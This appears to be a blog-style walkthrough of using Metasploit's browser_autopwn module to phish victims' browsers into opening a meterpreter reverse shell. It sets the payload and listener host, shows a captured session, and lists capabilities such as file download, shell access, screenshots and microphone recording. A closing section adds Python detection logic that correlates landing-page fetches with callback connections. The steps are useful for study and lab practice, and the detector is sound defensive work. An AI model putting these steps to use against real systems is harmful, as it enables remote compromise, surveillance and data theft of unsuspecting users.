The autopwn covered in this post is the one that ships with Kali,
not the autopwn that was present in BT5 and has since been removed.
1. Open msfconsole, locate the autopwn module and load it

msf > search autopwn

Matching Modules
================

   Name                              Disclosure Date  Rank    Description
   ----                              ---------------  ----    -----------
   auxiliary/server/browser_autopwn                   normal  HTTP Client Automatic Exploiter

msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) >
2. Configure the module; use show options to check the settings
msf auxiliary(browser_autopwn) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf auxiliary(browser_autopwn) > set LHOST 192.168.154.133
LHOST => 192.168.154.133
msf auxiliary(browser_autopwn) > show options
Module options (auxiliary/server/browser_autopwn):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST    192.168.154.133  yes       The IP address to use for reverse-connect payloads
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits
msf auxiliary(browser_autopwn) >
3. Start phishing
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed
[*] Setup
[*] Obfuscating initial javascript 2015-03-29 13:30:57 +0800
msf auxiliary(browser_autopwn) > [*] Done in 1.298861072 seconds
[*] Starting exploit modules on host 192.168.154.133...
[*] ---
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:8080/cqTfdfXcWFC
[*] Local IP: http://192.168.154.133:8080/cqTfdfXcWFC
[*] Server started.
4. Wait for the other side's browser to visit
http://192.168.154.133:8080/fMOGHtWS
[*] Sending stage (30355 bytes) to 192.168.154.136
[*] Meterpreter session 1 opened (192.168.154.133:7777 -> 192.168.154.136:1083) at 2015-03-29 13:36:19 +0800
[*] Session ID 1 (192.168.154.133:7777 -> 192.168.154.136:1083) processing InitialAutoRunScript 'migrate -f'
5. Open a session

msf auxiliary(browser_autopwn) > sessions -l

Active sessions
===============

  Id  Type                   Information              Connection
  --  ----                   -----------              ----------
  1   meterpreter java/java  admin @ admin-ca9ac4217  192.168.154.133:7777 -> 192.168.154.136:1083 (192.168.154.136)

msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >
6. Interacting with the session

meterpreter > getuid
Server username: admin
meterpreter > sysinfo
Computer    : admin-ca9ac4217
OS          : Windows XP 5.1 (x86)
Meterpreter : java/java
meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command   Description
    -------   -----------
    cat       Read the contents of a file to the screen
    cd        Change directory
    download  Download a file or directory
    edit      Edit a file
    getlwd    Print local working directory
    getwd     Print working directory
    lcd       Change local working directory
    lpwd      Print local working directory
    ls        List files
    mkdir     Make directory
    pwd       Print working directory
    rm        Delete the specified file
    rmdir     Remove directory
    search    Search for files
    upload    Upload a file or directory

Stdapi: Networking Commands
===========================

    Command   Description
    -------   -----------
    ifconfig  Display interfaces
    ipconfig  Display interfaces
    portfwd   Forward a local port to a remote service
    route     View and modify the routing table

Stdapi: System Commands
=======================

    Command  Description
    -------  -----------
    execute  Execute a command
    getuid   Get the user that the server is running as
    ps       List running processes
    shell    Drop into a system command shell
    sysinfo  Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

    Command     Description
    -------     -----------
    screenshot  Grab a screenshot of the interactive desktop

Stdapi: Webcam Commands
=======================

    Command     Description
    -------     -----------
    record_mic  Record audio from the default microphone for X seconds

meterpreter >
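Seen from the defender's side, the sequence above leaves a recognisable trace in network logs: a client fetches a randomly named path from a non-standard web port (the landing page on 8080), and seconds later the same client opens a new outbound TCP connection back to the same host on a different port (the stage delivery on 7777). The following detection logic is an added example and not part of the original post; the proxy and firewall log format, the 60-second window, and the 8-12 character random-path heuristic are assumptions for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log (not from the original post): one web-proxy line per
# page fetch and one firewall line per new outbound TCP connection. The
# addresses, ports and URIs mirror the walkthrough above.
SAMPLE_LOG = """\
2015-03-29 13:36:10 proxy src=192.168.154.136 dst=192.168.154.133:8080 GET /fMOGHtWS
2015-03-29 13:36:12 proxy src=192.168.154.136 dst=192.168.154.133:8080 GET /cqTfdfXcWFC
2015-03-29 13:36:19 fw src=192.168.154.136:1083 dst=192.168.154.133:7777 proto=tcp new
2015-03-29 13:40:00 proxy src=192.168.154.140 dst=10.0.0.5:80 GET /index.html
2015-03-29 13:50:00 fw src=192.168.154.140:2000 dst=10.0.0.5:443 proto=tcp new
"""

PROXY_RE = re.compile(r"^(\S+ \S+) proxy src=(\S+) dst=(\S+):(\d+) GET (\S+)$")
FW_RE = re.compile(r"^(\S+ \S+) fw src=(\S+):\d+ dst=(\S+):(\d+) proto=tcp new$")
# browser_autopwn's default URIPATH is a random alphanumeric token (see the
# "Using URL" line above); the length range here is a heuristic, not a signature.
RANDOM_PATH_RE = re.compile(r"^/[A-Za-z0-9]{8,12}$")
WEB_PORTS = {"80", "443"}


def _ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def detect_autopwn_chains(log, window_seconds=60):
    """Map (client, server, callback_port) -> landing URIs fetched from that
    server shortly before the client opened a new connection back to it."""
    landings = defaultdict(list)  # client -> [(time, server, uri)]
    alerts = defaultdict(list)
    for line in log.splitlines():
        m = PROXY_RE.match(line)
        if m:
            ts, src, dst, port, uri = m.groups()
            if port not in WEB_PORTS and RANDOM_PATH_RE.match(uri):
                landings[src].append((_ts(ts), dst, uri))
            continue
        m = FW_RE.match(line)
        if m:
            ts, src, dst, port = m.groups()
            if port in WEB_PORTS:
                continue  # ordinary browsing; only unusual callback ports count
            for seen_at, server, uri in landings.get(src, []):
                if server == dst and 0 <= (_ts(ts) - seen_at).total_seconds() <= window_seconds:
                    alerts[(src, dst, int(port))].append(uri)
    return dict(alerts)


if __name__ == "__main__":
    for key, uris in detect_autopwn_chains(SAMPLE_LOG).items():
        print("suspected browser exploit chain:", key, uris)
```

Setting URIPATH or SRVPORT to ordinary-looking values defeats the path and port heuristics, so in practice the landing-then-callback timing correlation is the part worth keeping.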